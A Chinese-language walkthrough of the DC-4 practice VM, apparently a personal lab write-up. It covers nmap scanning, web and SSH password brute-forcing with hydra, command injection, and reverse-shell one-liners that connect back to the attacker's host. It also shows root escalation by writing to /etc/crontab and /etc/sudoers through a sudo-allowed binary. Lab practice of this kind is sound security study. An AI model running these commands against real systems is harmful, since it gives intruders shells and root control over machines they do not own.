暢遊DC-4靶機

信息蒐集

nmap -sP 192.168.146.0/24 #掃網段看看存活的主機，找到靶機
nmap -sS -Pn -A 192.168.146.141

能夠看到開放了22和80端口，那麼就能夠猜想下，可能要爆破ssh密碼或者獲得帳號密碼直接ssh連上去。
這裏先訪問web頁面，只有一個登錄頁面，那就先掃描下目錄。

看到訪問command.php後又跳轉回index.php，那麼估計是要登錄纔可使用了。

getFlag

Web登錄密碼爆破

這裏沒什麼線索，可是登錄不用填驗證碼，就直接嘗試爆破吧。

爆破出用戶名*，密碼happy。


也就是說這裏只用密碼happy就能登錄

命令執行之反彈shell

登錄進頁面看到命令執行選項，這種狀況估計就是參數傳遞命令，抓個包看看就好了。

能夠看到確實是在radio參數傳輸命令，可是這樣比較麻煩，嘗試反彈shell。

bash -i >& /dev/tcp/192.168.146.131/4444 0>&1
這裏要將&符號url編碼下，以便區分參數間的&符號，固然能夠直接所有url編碼下。bash反彈失敗

nc 192.168.31.131 4444 -t /bin/bash #nc反彈成功

根據以前的靶機，能夠直接進入/home目錄下看看有哪些用戶

經檢測，charles和sam目錄沒法ls出文件，而jim能夠。

大概就是mbox咱們沒有讀的權限，backups裏面又一堆舊密碼，test.sh內容以下

SSH密碼爆破

信息蒐集的時候咱們就知道22端口是開着的，能夠ssh上去。
因此這裏的old-passwords多是jim進行ssh的舊密碼(如今的密碼也可能在其中)，那麼就down下來用hydra爆破下。

hydra -l jim -P pwd.txt ssh://192.168.146.141

爆破出用戶名是jim，密碼是jibril04。直接連上去

提權

ssh jim@192.168.146.141
登錄進去看mbox，是一封郵件

既然有郵件，就想到去/var/mail目錄下看看，看到郵件的具體內容。有Charles發來的密碼。

密碼是^xHhA&hvim0y，準備登錄charles了。在這以前，先看看jim有沒有sudo權限，好的是沒有的。
sudo -l

有密碼了，直接ssh連上去，ls -al查看charles目錄下的內容

看這三個文件沒有發現什麼有用的信息。那就也來看看有沒有sudo權限。

能夠發現，能夠不用密碼使用root權限操做/usr/bin/teehee，這個可執行文件，查看下幫助。

它能夠將標準輸入複製到每一個文件，那麼好辦了，既然能夠用root權限寫文件？那豈不是直接快樂就完事了？
測試下：（成功寫入文件）

想一想幾個重要的文件，無非就是定時任務文件(crontab)，sudoers文件
先來玩玩定任務文件把。
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

再來寫/etc/sudoers文件，先看看本地sudoers文件的語法。

仿造寫一個 charles ALL=(ALL:ALL) ALL

能夠看到如今charles能夠以root用戶身份運行全部命令

總結

總的來講這個靶機也並不難，學到的東西好像也並非不少。。。 主要就學到了利用suid提權，這個利用這個root權限能夠寫文件。以後就是有寫文件權限提權的思路了。